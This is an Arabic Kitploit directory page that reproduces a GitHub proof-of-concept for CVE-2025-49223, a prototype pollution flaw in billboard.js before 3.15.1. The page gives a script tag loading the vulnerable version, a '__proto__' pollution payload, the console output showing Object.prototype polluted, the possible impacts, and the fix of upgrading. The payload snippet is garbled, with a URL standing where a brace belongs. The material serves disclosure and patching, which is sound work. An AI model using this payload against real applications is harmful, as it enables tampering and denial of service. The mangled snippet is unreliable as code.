Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-49223-BillboardJS-PoC — CVE-2025-49223 - تلوث النموذج الأولي في Billboard.js | Kitploit
أدوات/GitHubGitHub/louay-075/cve-2025-49223-billboardjs-poc
تحليل الثغرات الأمنيةالاستغلالأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHublouay-075/cve-2025-49223-billboardjs-poc

CVE-2025-49223-BillboardJS-PoC

CVE-2025-49223 - تلوث النموذج الأولي في Billboard.js

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
11منذ سنة واحدةلم تتم المراجعة بعد

💥 CVE-2025-49223 - تلوث النموذج الأولي في Billboard.js

تم اكتشاف أن billboard.js قبل الإصدار 3.15.1 يحتوي على تلوث للنموذج الأولي عبر الدالة generate، مما قد يسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية أو التسبب في رفض الخدمة (DoS) عن طريق حقن خصائص عشوائية.

يُظهر هذا المستودع ثغرة تلوث النموذج الأولي الموجودة في إصدارات billboard.js قبل 3.15.1، والتي تم الكشف عنها باسم CVE-2025-49223.


📌 ملخص

  • نوع الثغرة: تلوث النموذج الأولي
  • المكتبة المتأثرة: billboard.js
  • الإصدارات المتأثرة: <= 3.14.0
  • الإصدار المُصحَّح: >= 3.15.1
  • CVE ID: CVE-2025-49223
  • التأثير: تنفيذ تعليمات برمجية عشوائية أو التسبب في رفض الخدمة

🧪 إثبات المفهوم (PoC)

افتح index.html في متصفح وتحقق من سجل وحدة التحكم لمحاولات تلوث النموذج الأولي.

تحميل الإصدار الضعيف:

root@kitploit:~
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/billboard.pkgd.min.js"></script>

محاولة التلوث:

root@kitploit:~
{
  ["__proto__"]: https://raw.githubusercontent.com/louay-075/cve-2025-49223-billboardjs-poc/HEAD/%7B
    polluted: "polluted_via_string_key"
  }
}

مخرجات وحدة التحكم:

root@kitploit:~
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key

يؤكد هذا أنه يمكن للمهاجم تلويث Object.prototype، مما يؤثر على أي كائن مستقبلي يتم إنشاؤه عبر الصفحة.


🔥 التأثير

قد يؤدي الاستغلال الناجح إلى:

  • حقن مفتاح عشوائي في جميع الكائنات
  • العبث بمنطق عرض الرسم البياني
  • تعطل التطبيق (DoS)
  • إمكانية تجاوز الأمان في التطبيقات التي تعتمد على دمج الكائنات غير الآمن


🛡️ التخفيف

  • ✅ الترقية إلى إصدار billboard.js 3.15.1 أو أحدث

🧱 المراجع

  • 🔗 CVE-2025-49223 على NVD
  • 🔗 ملاحظات إصدار Billboard.js 3.15.1


⚠️ إخلاء مسؤولية: إثبات المفهوم هذا لأغراض تعليمية وبحثية فقط. استخدمه بمسؤولية.

تنزيل الأداة